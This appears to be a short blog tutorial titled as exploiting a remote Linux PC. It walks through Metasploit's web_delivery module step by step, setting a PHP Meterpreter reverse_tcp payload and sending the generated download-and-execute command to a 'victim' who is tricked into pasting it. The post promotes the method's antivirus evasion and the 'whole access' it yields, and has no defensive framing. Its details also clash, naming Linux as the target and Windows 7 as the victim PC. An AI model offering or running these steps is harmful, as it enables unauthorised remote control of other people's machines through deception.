Exploit Remote Linux PC using PHP File

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Linux

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Copy the highlighted text shown In below window and send it to the victim

When the victim paste the highlighted text in terminal and run it ,you get the whole access of victim system

Leave a Reply

Your email address will not be published. Required fields are marked *